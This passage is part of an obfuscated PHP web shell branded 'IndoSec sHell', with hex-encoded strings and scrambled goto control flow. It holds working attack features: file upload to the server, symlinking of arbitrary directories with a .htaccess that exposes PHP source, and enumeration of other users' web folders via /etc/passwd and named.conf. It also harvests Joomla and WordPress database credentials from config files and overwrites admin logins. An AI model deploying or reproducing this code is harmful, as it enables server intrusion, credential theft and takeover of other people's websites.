73\163\75\x22\142\x74\156\x20\x62\x74\156\x2d\144\141\x6e\147\x65\162\40\x62\x74\156\x2d\142\x6c\x6f\x63\x6b\x22\40\x76\x61\x6c\x75\x65\75\x22\x45\x78\x65\x63\x75\x74\x65\42\x20\156\141\155\145\75\42\x65\x78\145\x63\x75\x74\x65\x22\57\x3e\12\11\x9\74\x2f\x66\157\162\x6d\76"; if ($_POST["\145\170\x65\x63\165\164\x65"]) { rmdir("\151\x6e\x64\157\x73\x65\x63\x5f\x73\171\155\x34\x30\x34"); mkdir("\151\x6e\x64\157\163\145\x63\137\163\x79\x6d\64\60\64", 511); $dir = $_POST["\144\x69\x72"]; $isi = $_POST["\x69\x73\151"]; system("\x6c\156\40\x2d\x73\x20" . $dir . "\151\x6e\144\x6f\x73\x65\x63\x5f\163\x79\155\x34\60\x34\x2f" . $isi); symlink($dir, "\x69\156\x64\157\163\x65\143\x5f\163\171\x6d\x34\60\x34\x2f" . $isi); $inija = fopen("\x69\x6e\144\157\x73\x65\x63\x5f\163\171\155\x34\60\x34\57\56\x68\x74\141\x63\143\x65\x73\163", "\x77"); fwrite($inija, "\x52\145\x61\x64\x6d\145\116\141\x6d\x65\x20" . $isi . "\xa\x4f\160\164\x69\157\156\x73\40\111\156\x64\145\170\145\x73\40\x46\157\154\x6c\157\167\x53\x79\155\x4c\x69\x6e\153\163\12\x44\151\162\x65\x63\164\157\162\x79\x49\x6e\144\145\x78\40\151\x64\163\x2e\x68\164\x6d\x6c\12\101\144\x64\124\171\x70\145\40\x74\x65\170\x74\x2f\x70\x6c\x61\151\x6e\x20\56\160\x68\160\12\101\x64\x64\x48\x61\x6e\x64\x6c\145\162\40\164\145\x78\164\x2f\x70\154\141\x69\156\x20\56\160\x68\160\xa\x53\141\164\x69\x73\146\x79\x20\101\x6e\x79"); echo "\x3c\x61\x20\x68\x72\x65\146\75\42\x2f\151\156\144\x6f\163\x65\x63\137\163\171\x6d\64\60\x34\x2f\x22\40\x74\x61\162\147\145\x74\x3d\42\137\142\154\x61\156\153\x22\76\40\76\76\123\165\x6b\x73\x65\163\74\x3c\x20\x3c\x2f\141\x3e"; } die; } goto PoD22; k1N0A: $os = php_uname(); goto vYk78; CTlYv: if (isset($_GET["\x70\141\x74\150"])) { $path = $_GET["\x70\141\164\x68"]; chdir($path); } else { $path = getcwd(); } goto h2GTS; L24e8: if ($_GET["\x61\153\163\x69"] == "\165\x70\154\157\141\144") { echo "\x3c\x66\x6f\x72\x6d\x20\x6d\145\x74\150\x6f\x64\75\42\120\x4f\x53\124\x22\40\145\156\x63\x74\171\x70\145\75\42\155\x75\154\164\x69\x70\141\x72\164\57\x66\x6f\x72\x6d\x2d\x64\141\164\141\42\40\156\x61\x6d\145\x3d\42\165\x70\x6c\x6f\141\144\145\162\x22\x20\151\144\75\x22\x75\x70\x6c\x6f\141\x64\x65\162\42\x3e\xa\11\x9\x9\x9\74\x64\x69\166\40\x63\154\141\x73\163\75\42\143\141\162\144\x20\x6d\x74\55\64\42\x3e\12\11\x9\x9\11\11\74\144\151\x76\40\x63\154\141\x73\163\x3d\42\x63\x61\x72\144\55\x62\157\x64\171\x20\x66\157\162\155\x2d\x67\162\x6f\x75\160\x22\76\xa\11\11\11\x9\x9\11\74\x70\40\x63\x6c\141\163\163\x3d\x22\x74\145\x78\164\55\x6d\x75\164\145\144\42\x3e\57\57\115\x75\154\x74\151\160\154\x65\40\x55\x70\x6c\157\x61\144\x3c\57\160\76\xa\x9\11\11\x9\11\11\74\144\151\x76\x20\143\154\x61\x73\x73\75\42\143\165\163\x74\157\x6d\x2d\146\x69\x6c\145\42\x3e\12\11\x9\11\x9\11\x9\x9\x3c\151\156\160\x75\164\40\164\x79\160\145\75\42\x66\x69\x6c\145\x22\x20\156\141\x6d\x65\x3d\x22\x66\x69\154\145\x5b\x5d\x22\40\155\165\x6c\x74\x69\160\154\145\40\143\154\141\163\x73\75\x22\x63\165\163\164\x6f\x6d\55\x66\151\154\145\55\x69\x6e\160\165\x74\42\40\x69\x64\75\42\x63\165\x73\x74\157\x6d\x46\151\154\x65\42\76\xa\11\x9\11\x9\x9\11\11\74\154\141\142\145\x6c\40\x63\x6c\x61\163\163\x3d\x22\x63\165\163\164\x6f\x6d\55\146\x69\154\145\x2d\x6c\141\142\145\154\42\x20\x66\157\x72\75\42\143\165\x73\164\x6f\155\106\151\x6c\145\x22\x3e\103\x68\157\157\163\x65\x20\146\151\x6c\x65\x3c\x2f\154\x61\142\x65\x6c\x3e\12\x9\11\11\11\11\x9\x3c\57\144\151\166\x3e\xa\x9\x9\x9\11\x9\x9\74\x69\156\160\x75\164\40\164\171\160\x65\x3d\42\x73\165\142\155\151\164\42\40\x63\x6c\141\x73\163\x3d\x22\142\164\156\x20\x62\164\156\x2d\163\x6d\x20\142\x74\x6e\55\x70\162\151\x6d\141\x72\x79\40\x62\x74\156\x2d\142\154\157\143\x6b\x20\x6d\164\x2d\64\40\x70\x2d\x32\x22\x20\x6e\x61\155\x65\75\42\165\160\154\x6f\x61\x64\42\x20\166\141\154\165\x65\x3d\42\125\160\x6c\x6f\141\x64\42\x3e\xa\11\x9\x9\x9\11\74\x2f\x64\151\166\76\xa\11\x9\11\11\74\57\x64\x69\x76\x3e\xa\x9\x9\11\74\57\146\157\162\x6d\x3e"; if (isset($_POST["\165\x70\x6c\x6f\x61\144"])) { $jumlah = count($_FILES["\146\151\154\x65"]["\156\141\x6d\145"]); for ($i = 0; $i < $jumlah; $i++) { $filename = $_FILES["\x66\x69\154\145"]["\156\141\x6d\145"][$i]; $up = @copy($_FILES["\146\x69\x6c\145"]["\x74\155\x70\137\x6e\x61\x6d\x65"][$i], "{$dir}\x2f" . $filename); } if ($jumlah < 2) { if ($up) { echo "\74\x73\x63\x72\151\160\x74\76\141\154\145\162\x74\50\x22\x42\145\162\150\141\163\x69\x6c\x20\x55\x70\154\157\141\144\x20" . $filename . "\42\x29\x3b\74\x2f\163\x63\162\x69\160\164\x3e"; } else { echo "\74\163\143\x72\151\160\164\76\141\154\145\162\164\50\42\107\141\x67\141\154\x20\x55\x70\154\x6f\141\x64\x21\41\41\42\x29\73\74\x2f\x73\x63\162\x69\x70\164\x3e"; } } else { echo "\74\163\143\162\x69\x70\x74\x3e\x61\154\x65\x72\x74\x28\x22\x42\145\162\150\141\x73\x69\154\x20\x55\160\154\157\141\144\40" . $jumlah . "\40\106\x69\x6c\145\42\51\x3b\x3c\57\163\x63\162\151\x70\x74\x3e"; } } } goto Ok3YC; rqWOj: function r($dir, $perm) { if (!is_readable($dir)) { return "\74\x66\157\x6e\164\40\x63\x6f\x6c\157\x72\75\x72\145\x64\76" . $perm . "\74\x2f\146\157\156\164\76"; } else { return "\x3c\146\157\156\x74\x20\143\157\x6c\157\162\x3d\154\x69\155\145\x3e" . $perm . "\74\57\146\x6f\156\x74\x3e"; } } goto VIISu; gmIGR: $path = str_replace("\x5c", "\57", $path); goto Fa07H; Fa07H: $paths = explode("\x2f", $path); goto gUTTf; fnGp0: if ($_GET["\141\153\x73\151"] == "\x6a\x75\x6d\x70\151\156\x67") { $i = 0; echo "\74\144\x69\166\40\143\x6c\141\163\163\75\x27\143\141\162\144\x20\x63\x6f\156\x74\x61\151\x6e\x65\162\47\76"; if (preg_match("\x2f\150\x73\x70\150\145\x72\145\57", $dir)) { $urls = explode("\15\12", $_POST["\x75\162\x6c"]); if (isset($_POST["\x6a\165\x6d\x70"])) { echo "\74\x70\x72\145\x3e"; foreach ($urls as $url) { $url = str_replace(array("\x68\x74\x74\160\72\x2f\57", "\x77\167\167\x2e"), '', strtolower($url)); $etc = "\57\145\164\x63\x2f\x70\x61\x73\x73\x77\144"; $f = fopen($etc, "\x72"); while ($gets = fgets($f)) { $pecah = explode("\x3a", $gets); $user = $pecah[0]; $dir_user = "\x2f\150\163\160\x68\x65\162\x65\57\154\x6f\x63\141\x6c\57\150\157\x6d\x65\57{$user}"; if (is_dir($dir_user) === true) { $url_user = $dir_user . "\57" . $url; if (is_readable($url_user)) { $i++; $jrw = "\x5b\x3c\x66\157\156\x74\x20\x63\x6f\154\x6f\x72\75\147\x72\x65\x65\156\76\x52\x3c\57\x66\157\156\x74\76\x5d\x20\74\x61\x20\x68\x72\145\146\x3d\47\x3f\x64\151\x72\75{$url_user}\47\x3e\x3c\x66\x6f\156\164\x20\143\x6f\x6c\x6f\162\75\x23\60\60\64\x36\106\106\x3e{$url_user}\x3c\x2f\146\x6f\x6e\164\76\74\x2f\141\x3e"; if (is_writable($url_user)) { $jrw = "\133\x3c\x66\157\156\x74\x20\x63\x6f\154\x6f\x72\x3d\147\x72\x65\145\x6e\x3e\122\x57\74\57\x66\157\156\x74\76\135\x20\x3c\x61\x20\150\x72\145\146\75\47\x3f\144\151\x72\75{$url_user}\47\76\x3c\x66\x6f\x6e\164\x20\x63\157\x6c\x6f\x72\75\43\60\x30\64\66\106\106\76{$url_user}\x3c\x2f\146\x6f\156\164\76\x3c\x2f\x61\76"; } echo $jrw . "\x3c\142\162\x3e"; } } } } if ($i == 0) { } else { echo "\74\x62\x72\76\124\x6f\164\141\154\40\141\x64\141\x20" . $i . "\x20\x4b\x61\x6d\x61\x72\40\144\151\40" . $ip; } echo "\74\x2f\160\x72\x65\76"; } else { echo "\x3c\143\145\156\164\145\x72\x3e\12\x9\x9\11\x9\x9\40\x20\74\146\x6f\x72\155\x20\155\145\164\x68\x6f\x64\x3d\x22\x70\157\x73\164\x22\76\12\11\11\11\11\11\40\40\x4c\x69\163\164\40\x44\x6f\155\141\x69\x6e\x73\x3a\x20\74\142\x72\x3e\12\x9\x9\11\x9\11\x20\40\x3c\x74\x65\x78\x74\141\162\145\141\40\156\141\155\x65\75\x22\165\162\x6c\x22\40\x63\154\x61\x73\x73\x3d\x22\x66\157\162\155\x2d\143\x6f\156\x74\x72\x6f\154\42\76"; $fp = fopen("\57\150\x73\160\150\x65\162\145\57\x6c\157\x63\141\x6c\57\x63\x6f\x6e\x66\151\x67\57\x68\164\164\x70\x64\57\163\151\x74\x65\x73\57\163\x69\164\x65\x73\x2e\164\170\x74", "\x72"); while ($getss = fgets($fp)) { echo $getss; } echo "\74\57\x74\145\x78\x74\x61\162\145\x61\x3e\74\x62\x72\76\12\x9\x9\x9\11\x9\x20\x20\x3c\151\156\x70\x75\x74\x20\164\x79\x70\145\75\42\x73\165\x62\155\x69\164\x22\40\x76\141\154\x75\x65\x3d\x22\x4a\x75\x6d\160\x69\156\x67\x22\40\x6e\141\x6d\x65\75\x22\152\x75\155\x70\42\40\163\164\x79\x6c\x65\x3d\42\x77\x69\144\x74\x68\72\x20\x35\x30\x30\x70\170\x3b\x20\150\145\151\147\x68\164\72\x20\x32\65\160\x78\x3b\x22\x3e\12\11\11\x9\x9\x9\x20\40\x3c\x2f\146\x6f\x72\155\76\74\x2f\143\145\x6e\164\x65\x72\76"; } } elseif (preg_match("\x2f\x76\150\157\x73\x74\x73\x2f", $dir)) { $urls = explode("\xd\xa", $_POST["\165\162\x6c"]); if (isset($_POST["\x6a\165\x6d\160"])) { echo "\x3c\160\x72\x65\76"; foreach ($urls as $url) { $web_vh = "\x2f\x76\141\x72\x2f\x77\167\x77\x2f\166\150\x6f\163\x74\163\57{$url}\x2f\150\x74\x74\x70\144\157\143\x73"; if (is_dir($web_vh) === true) { if (is_readable($web_vh)) { $i++; $jrw = "\133\74\x66\157\x6e\164\x20\x63\157\x6c\157\162\x3d\x67\x72\145\x65\156\x3e\122\74\57\146\x6f\156\164\76\135\x20\x3c\x61\40\x68\162\x65\146\x3d\47\x3f\144\151\x72\75{$web_vh}\47\76\74\146\157\156\164\40\x63\x6f\154\x6f\162\x3d\43\x30\60\x34\66\x46\x46\76{$web_vh}\x3c\57\x66\157\156\164\76\x3c\x2f\141\x3e"; if (is_writable($web_vh)) { $jrw = "\x5b\x3c\146\x6f\x6e\164\40\x63\x6f\x6c\157\162\x3d\x67\162\x65\145\x6e\x3e\x52\127\x3c\57\146\x6f\156\x74\x3e\x5d\40\x3c\141\40\150\x72\145\x66\75\47\x3f\x64\151\x72\x3d{$web_vh}\x27\x3e\74\x66\x6f\156\x74\x20\x63\x6f\154\157\162\x3d\x23\60\60\x34\x36\106\x46\x3e{$web_vh}\x3c\x2f\x66\157\x6e\164\x3e\x3c\57\x61\x3e"; } echo $jrw . "\x3c\x62\x72\76"; } } } if ($i == 0) { } else { echo "\x3c\142\x72\x3e\x54\157\164\141\x6c\40\x61\144\141\40" . $i . "\40\x4b\141\x6d\x61\x72\40\144\x69\x20" . $ip; } echo "\x3c\x2f\160\x72\x65\76"; } else { echo "\74\x63\x65\x6e\x74\x65\x72\x3e\xa\11\11\x9\x9\11\x20\40\74\x66\157\x72\155\40\x6d\x65\164\x68\x6f\x64\75\42\x70\x6f\163\164\42\76\12\x9\x9\x9\x9\11\40\40\x4c\151\163\x74\40\104\157\155\141\151\156\x73\72\x20\x3c\x62\162\x3e\xa\11\11\11\x9\11\x20\40\74\164\x65\170\x74\141\x72\x65\141\x20\x6e\x61\x6d\x65\x3d\x22\x75\162\154\42\x20\x63\154\x61\163\x73\x3d\x22\146\157\162\155\x2d\143\157\x6e\164\162\x6f\154\x22\76"; bing("\151\160\72{$ip}"); echo "\x3c\x2f\164\x65\170\164\x61\x72\145\141\76\x3c\142\162\x3e\xa\x9\11\x9\11\x9\x20\40\x3c\151\x6e\x70\165\164\x20\x74\171\x70\x65\x3d\x22\163\165\142\x6d\151\x74\42\x20\x76\x61\154\165\x65\x3d\x22\112\165\x6d\160\x69\156\x67\42\40\x6e\x61\x6d\x65\75\42\152\x75\155\x70\x22\40\163\164\x79\x6c\145\75\x22\x77\151\x64\x74\150\x3a\x20\x35\x30\60\x70\x78\73\x20\150\145\151\x67\150\164\x3a\x20\x32\x35\160\170\73\x22\76\xa\xa\x9\11\x9\11\x9\x20\40\74\57\x66\157\x72\x6d\x3e\x3c\57\143\145\156\164\x65\x72\76"; } } else { echo "\x3c\x70\x72\145\x3e"; $etc = fopen("\x2f\145\164\143\x2f\160\141\x73\x73\x77\x64", "\162") or die("\x3c\x66\157\x6e\164\40\x63\157\154\x6f\x72\x3d\162\x65\x64\76\x43\x61\156\47\x74\40\162\x65\x61\144\x20\57\x65\x74\x63\57\160\x61\x73\163\x77\144\x3c\x2f\146\x6f\156\164\x3e\x3c\x62\x72\57\x3e"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "\x3c\146\x6f\156\164\40\x63\x6f\x6c\157\162\x3d\x72\145\144\x3e\x43\x61\x6e\47\x74\x20\162\145\141\144\40\57\x65\x74\x63\x2f\160\141\x73\163\167\144\74\57\x66\157\x6e\164\x3e\x3c\x62\x72\57\x3e"; } else { preg_match_all("\x2f\50\56\52\77\51\72\x78\x3a\57", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_pro_jump) { $user_jumping_dir = "\57\x68\157\x6d\145\x2f{$user_pro_jump}\x2f\160\x75\142\x6c\x69\143\x5f\150\x74\x6d\x6c"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "\x5b\74\146\x6f\156\x74\x20\143\157\154\x6f\x72\75\147\x72\145\x65\x6e\76\x52\74\x2f\x66\x6f\156\164\76\x5d\x20\74\x61\x20\x68\162\x65\146\x3d\x27\x3f\144\151\x72\x3d{$user_jumping_dir}\x27\x3e\x3c\x66\x6f\x6e\164\40\143\157\154\x6f\x72\75\43\60\x30\x34\x36\106\x46\76{$user_jumping_dir}\x3c\x2f\x66\157\x6e\x74\76\74\57\141\76"; if (is_writable($user_jumping_dir)) { $jrw = "\133\x3c\146\x6f\x6e\164\x20\x63\157\154\x6f\x72\x3d\x67\x72\x65\145\x6e\76\x52\x57\x3c\57\146\157\x6e\164\76\x5d\40\x3c\x61\x20\150\x72\x65\146\x3d\x27\x3f\x64\x69\162\75{$user_jumping_dir}\x27\76\x3c\146\x6f\156\164\x20\x63\x6f\154\x6f\162\x3d\43\x30\x30\x34\x36\106\106\76{$user_jumping_dir}\74\x2f\x66\157\x6e\x74\x3e\x3c\57\x61\76"; } echo $jrw; if (function_exists("\160\157\163\x69\170\137\x67\x65\x74\x70\167\x75\x69\x64")) { $domain_jump = file_get_contents("\57\x65\x74\x63\57\156\x61\x6d\x65\x64\x2e\x63\x6f\x6e\146"); if ($domain_jump == '') { echo "\x20\75\x3e\x20\50\40\x3c\146\x6f\156\x74\x20\143\157\154\x6f\162\75\x72\x65\x64\76\x67\x61\x62\x69\163\x61\x20\141\x6d\142\151\154\40\156\x61\155\x61\40\x64\157\x6d\x61\x69\x6e\40\x6e\x79\x61\x3c\x2f\146\x6f\x6e\164\76\x20\51\74\142\x72\76"; } else { preg_match_all("\43\57\166\x61\x72\x2f\x6e\x61\x6d\x65\x64\57\50\56\x2a\77\51\56\x64\142\43", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("\x2f\145\x74\143\x2f\x76\x61\154\151\x61\163\x65\x73\57{$dj}")); $user_jumping_url = $user_jumping_url["\156\141\155\145"]; if ($user_jumping_url == $user_pro_jump) { echo "\x20\x3d\x3e\x20\x28\40\74\165\76{$dj}\x3c\x2f\165\x3e\40\x29\74\142\x72\x3e"; break; } } } } else { echo "\x3c\142\162\76"; } } } } } if ($i == 0) { } else { echo "\x3c\142\162\x3e\124\x6f\x74\141\154\40\141\x64\x61\x20" . $i . "\40\113\141\x6d\141\x72\x20\144\151\40" . $ip; } echo "\74\x2f\160\162\145\76"; } echo "\74\57\x64\x69\x76\x3e\x3c\x62\x72\57\x3e"; die; } goto kcGCA; tnc1N: echo "\74\x61\40\x68\x72\x65\x66\75\x27\43\47\x20\143\154\x61\x73\x73\x3d\x27\163\143\162\x6f\154\154\x54\x6f\124\x6f\x70\47\76\x3c\x69\40\143\154\141\163\163\x3d\x27\x66\x61\x20\146\141\x2d\x61\x72\162\157\x77\x2d\165\x70\40\165\x70\x27\40\141\x72\x69\x61\55\150\x69\x64\144\145\156\x3d\x27\164\162\165\x65\47\76\74\x2f\x69\76\x3c\x2f\141\76"; goto HR7MM; DgzH7: ?>
<html><head><meta content="widht=device-widht,initial-scale=1"name="viewport"><meta content="Holiq"name="author"><meta content="{ IndoSec }"name="copyright"><link href="https://www.indsc.me/images/logo.png"rel="icon"type="image/png"><title>{ IndoSec sHell }</title><link href="pojan/assets/css/bootstrap.min.css"rel="stylesheet"><link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><script src="https://code.jquery.com/jquery-3.3.1.js"></script><script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script></head><body class="bg-dark text-light"><script>$(document).ready(function(){
				$(window).scroll(function(){
					if ($(this).scrollTop() > 700) {
						$(".scrollToTop").fadeIn();
					}else{
						$(".scrollToTop").fadeOut();
					}
				});
				$(".scrollToTop").click(function(){
					$("html, body").animate({scrollTop : 0},1000);
					return false;
				});
			});
			$(document).ready(function() {
				$('input[type="file"]').on("change", function() {
					let filenames = [];
					let files = document.getElementById("customFile").files;
					if (files.length > 1) {
						filenames.push("Total Files (" + files.length + ")");
					} else {
						for (let i in files) {
							if (files.hasOwnProperty(i)) {
								filenames.push(files[i].name);
							}
						}
					}
					$(this).next(".custom-file-label").html(filenames.join(","));
				});
			});</script><style>@import url(https://fonts.googleapis.com/css?family=Lato);@import url(https://fonts.googleapis.com/css?family=Quicksand);@import url(https://fonts.googleapis.com/css?family=Inconsolata);input[type=text],textarea{font-family:Inconsolata,monospace}body{margin:0;padding:0;font-family:Lato}#tab table thead th{padding:5px;font-size:16px}#tab tr{border-bottom:1px solid #fff}#tab tr:hover{background:#5b6f7d;color:#fff}#tab tr td{padding:5px}#tab tr td .badge{font-size:13px}#tab a{color:#fff}.active,.active:hover{color:#0f0}a{font-family:Quicksand;color:#fff}a:hover{color:#1e90ff}.badge{width:30px}.badge:hover{transform:scale(1.1);transition:all.3;cursor:pointer}.ico{width:25px}.ico2{width:30px}.scrollToTop{position:fixed;bottom:30px;right:30px;width:35px;height:35px;background:#262626;color:#fff;border-radius:15%;text-align:center;opacity:.5}.scrollToTop:hover{color:#fff}.up{font-size:25px;line-height:35px}.lain{color:#888;font-size:20px;margin-left:5px;top:1px}.lain:hover{color:#fff}.tambah{width:35px;height:35px;line-height:35px;border:1px solid;border-radius:50%;text-align:center}.fiture{margin:3px}.tmp th{font-size:14px}.tmp tr td{border:solid 1px #bbb;text-align:center;font-size:13px;padding:2px 5px}.tmp tr:hover{background:#5b6f7d;color:#fff}.about{color:#000}.about .card-body .img{position:relative;background:url(https://i.postimg.cc/Wb1X4xNS/image.png);background-size:cover;width:150px;height:150px}.butn{position:relative;text-align:center;padding:3px;background:rgba(225,225,225,.3);-webkit-transition:background .3s ease,color .3s ease;transition:background .3s ease,color .3s ease}input[type=radio].toggle{display:none}input[type=radio].toggle+label{cursor:pointer;margin:0 2px;width:60px}input[type=radio].toggle+label:after{position:absolute;content:"";top:0;background:#fff;height:100%;width:100%;z-index:-1;-webkit-transition:left .4s cubic-bezier(.77,0,.175,1);transition:left .4s cubic-bezier(.77,0,.175,1)}input[type=radio].toggle.toggle-left+label:after{left:100%}input[type=radio].toggle.toggle-right+label{margin-left:-5px}input[type=radio].toggle.toggle-right+label:after{left:-100%}input[type=radio].toggle:checked+label{cursor:default;color:#000;-webkit-transition:color .4s;transition:color .4s}input[type=radio].toggle:checked+label:after{left:0}</style><nav class="navbar navbar-dark static-top"><button aria-label="Toggle navigation"class="navbar-toggler"data-target="#info"data-toggle="collapse"type="button"><i class="fa fa-navicon"style="color:#fff"></i></button><div class="collapse navbar-collapse"id="info"><ul><a class="lain"href="https://facebook.com/IndoSecOfficial"><i class="fa tambah fa-facebook"></i></a> <a class="lain"href="https://www.instagram.com/indosec.id"><i class="fa tambah fa-instagram"></i></a> <a class="lain"href="https://www.youtube.com/IndoSec"><i class="fa tambah fa-youtube-play"></i></a> <a class="lain"href="https://github.com/indosecid"><i class="fa tambah fa-github"></i></a> <a class="lain"href="https://indosec.web.id"><i class="fa tambah fa-globe"></i></a></ul></div></nav><?php  goto zsyBf; y7fjP: echo "\74\57\x74\x61\142\154\x65\76\x3c\x2f\144\151\166\76\74\x68\x72\57\x3e\xa\x9\11\x3c\x63\145\x6e\x74\x65\x72\76\74\x61\40\x63\154\x61\x73\x73\x3d\42\164\145\170\164\55\x6d\165\164\x65\144\42\40\150\x72\x65\x66\75\x22\150\164\x74\x70\x73\x3a\x2f\x2f\x66\141\143\145\x62\157\157\153\x2e\143\157\155\57\111\156\144\x6f\x53\145\x63\x4f\x66\x66\x69\143\151\x61\x6c\42\x3e\103\157\x70\x79\162\151\147\x68\x74\40\62\60\x31\71\x20\173\40\111\x6e\144\157\123\x65\143\40\x7d\x3c\57\141\x3e\74\57\x63\x65\156\164\x65\x72\x3e\x3c\x62\x72\57\x3e"; goto tnc1N; VpdbN: if ($_GET["\x61\153\163\x69"] == "\x61\x75\164\145\x64\165\x73\145\x72") { if ($_POST["\150\x61\152\x61\162"]) { if (strlen($_POST["\x70\141\163\x73\x5f\142\x61\162\165"]) < 6 or strlen($_POST["\165\163\145\x72\x5f\x62\141\162\x75"]) < 6) { echo "\125\163\x65\x72\156\141\x6d\145\40\x64\141\156\40\120\141\163\163\x77\157\162\144\x20\150\x61\162\x75\163\40\154\145\x62\x69\x68\x20\144\141\162\151\40\66\x20\x6b\x61\x72\141\153\x74\145\162"; } else { $user_baru = $_POST["\x75\163\x65\162\137\x62\x61\x72\x75"]; $pass_baru = md5($_POST["\x70\141\x73\x73\x5f\142\141\x72\x75"]); $conf = $_POST["\143\x6f\x6e\146\151\147\137\x64\x69\162"]; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("{$conf}\57{$file_conf}")) { continue; } $config = file_get_contents("{$conf}\57{$file_conf}"); if (preg_match("\x2f\112\x43\157\156\x66\151\147\174\x6a\157\x6f\155\154\141\57", $config)) { $dbhost = ambilkata($config, "\x68\x6f\163\164\40\x3d\x20\x27", "\x27"); $dbuser = ambilkata($config, "\x75\163\x65\x72\x20\x3d\x20\x27", "\x27"); $dbpass = ambilkata($config, "\x70\141\163\x73\167\157\x72\x64\x20\x3d\40\x27", "\x27"); $dbname = ambilkata($config, "\x64\142\x20\x3d\40\x27", "\x27"); $dbprefix = ambilkata($config, "\144\142\x70\x72\145\146\151\170\x20\x3d\40\x27", "\x27"); $prefix = $dbprefix . "\165\x73\x65\162\163"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\x45\114\x45\x43\124\40\x2a\40\106\x52\117\115\x20{$prefix}\40\117\122\x44\x45\x52\x20\102\x59\x20\x69\x64\x20\101\123\x43"); $result = mysql_fetch_array($q); $id = $result["\x69\144"]; $site = ambilkata($config, "\x73\151\164\145\156\141\155\145\x20\75\40\x27", "\x27"); $update = mysql_query("\x55\x50\104\x41\x54\x45\40{$prefix}\40\123\105\124\40\x75\163\145\x72\x6e\141\155\145\75\x27{$user_baru}\x27\x2c\160\141\x73\x73\x77\157\x72\144\75\x27{$pass_baru}\47\40\127\x48\x45\x52\105\40\151\x64\x3d\x27{$id}\x27"); echo "\103\157\156\x66\151\147\x20\x3d\76\40" . $file_conf . "\x3c\x62\162\x3e"; echo "\x43\x4d\123\x20\x3d\x3e\x20\x4a\157\x6f\155\x6c\141\x3c\142\x72\76"; if ($site == '') { echo "\x53\x69\x74\x65\156\141\x6d\x65\x20\x3d\76\x20\74\146\x6f\x6e\164\x20\143\157\154\157\x72\x3d\162\145\x64\x3e\145\162\162\157\x72\54\40\147\x61\142\151\x73\x61\40\x61\x6d\142\151\154\40\156\x61\x6d\x61\x20\144\x6f\155\x61\x69\156\x20\x6e\171\x61\x3c\57\x66\157\156\164\76\x3c\142\162\x3e"; } else { echo "\x53\x69\164\x65\x6e\141\x6d\145\x20\x3d\x3e\x20{$site}\74\x62\162\x3e"; } if (!$update or !$conn or !$db) { echo "\x53\164\x61\164\x75\163\x20\75\x3e\x20\x3c\x66\157\x6e\x74\x20\143\157\x6c\157\x72\75\162\x65\x64\x3e" . mysql_error() . "\74\57\146\x6f\156\164\x3e\x3c\x62\x72\x3e\x3c\142\x72\x3e"; } else { echo "\x53\164\x61\x74\x75\163\x20\75\x3e\x20\74\x66\157\x6e\x74\x20\143\157\x6c\x6f\162\75\x6c\151\x6d\145\x3e\123\165\153\x73\145\163\x2c\x20\123\151\154\141\153\x61\156\x20\154\x6f\x67\151\x6e\x20\144\x65\x6e\147\x61\x6e\40\125\x73\145\162\40\x26\40\120\141\x73\163\x77\157\162\x64\40\x79\141\156\x67\x20\x62\141\x72\165\56\74\x2f\146\x6f\156\x74\x3e\x3c\x62\x72\x3e\x3c\x62\162\x3e"; } mysql_close($conn); } elseif (preg_match("\x2f\x57\157\x72\x64\120\162\145\163\163\57", $config)) { $dbhost = ambilkata($config, "\x44\x42\137\x48\x4f\123\x54\47\x2c\x20\47", "\47"); $dbuser = ambilkata($config, "\104\x42\137\x55\123\x45\122\x27\x2c\x20\x27", "\47"); $dbpass = ambilkata($config, "\x44\102\137\x50\101\123\x53\127\x4f\122\104\x27\x2c\40\x27", "\47"); $dbname = ambilkata($config, "\104\x42\137\116\101\115\105\47\54\40\47", "\47"); $dbprefix = ambilkata($config, "\x74\x61\142\x6c\145\x5f\160\x72\145\146\151\x78\x20\x20\75\x20\x27", "\x27"); $prefix = $dbprefix . "\x75\x73\x65\162\x73"; $option = $dbprefix . "\157\x70\164\151\157\156\163"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\x45\x4c\105\x43\124\x20\x2a\x20\106\122\117\x4d\x20{$prefix}\x20\x4f\x52\x44\x45\122\x20\102\x59\40\151\x64\40\101\x53\x43"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("\x53\x45\114\x45\103\124\x20\52\x20\106\x52\x4f\x4d\40{$option}\x20\x4f\122\104\x45\122\x20\x42\x59\x20\157\160\x74\x69\157\156\137\151\x64\x20\x41\x53\103"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { $url_target = "\114\157\147\151\x6e\40\75\76\x20\74\146\157\156\164\x20\x63\x6f\x6c\x6f\x72\75\x72\145\144\76\105\x72\162\x6f\x72\x2c\40\124\151\144\x61\153\x20\x64\x61\160\x61\x74\40\x6d\145\156\147\141\155\142\x69\x6c\x20\156\x61\155\x61\40\x64\x6f\x6d\x61\151\156\156\x79\x61\x3c\57\146\x6f\x6e\x74\76\74\x62\162\76"; } else { $url_target = "\114\x6f\147\x69\x6e\x20\x3d\x3e\x20\x3c\141\x20\150\162\145\146\x3d\47{$target}\x2f\167\160\x2d\154\157\147\151\156\x2e\x70\x68\160\47\x20\x74\x61\x72\x67\145\x74\75\47\x5f\x62\x6c\141\x6e\x6b\47\76\x3c\165\x3e{$target}\57\167\160\55\154\157\147\x69\x6e\x2e\x70\150\160\x3c\57\x75\x3e\74\57\141\x3e\74\142\162\76"; } $update = mysql_query("\125\120\104\x41\124\105\x20{$prefix}\40\123\105\x54\40\x75\x73\145\x72\137\x6c\x6f\147\151\156\75\x27{$user_baru}\47\x2c\x75\163\145\162\137\x70\141\163\x73\x3d\47{$pass_baru}\47\40\127\110\x45\122\x45\x20\151\144\75\x27{$id}\x27"); echo "\103\157\156\x66\151\147\x20\75\x3e\40" . 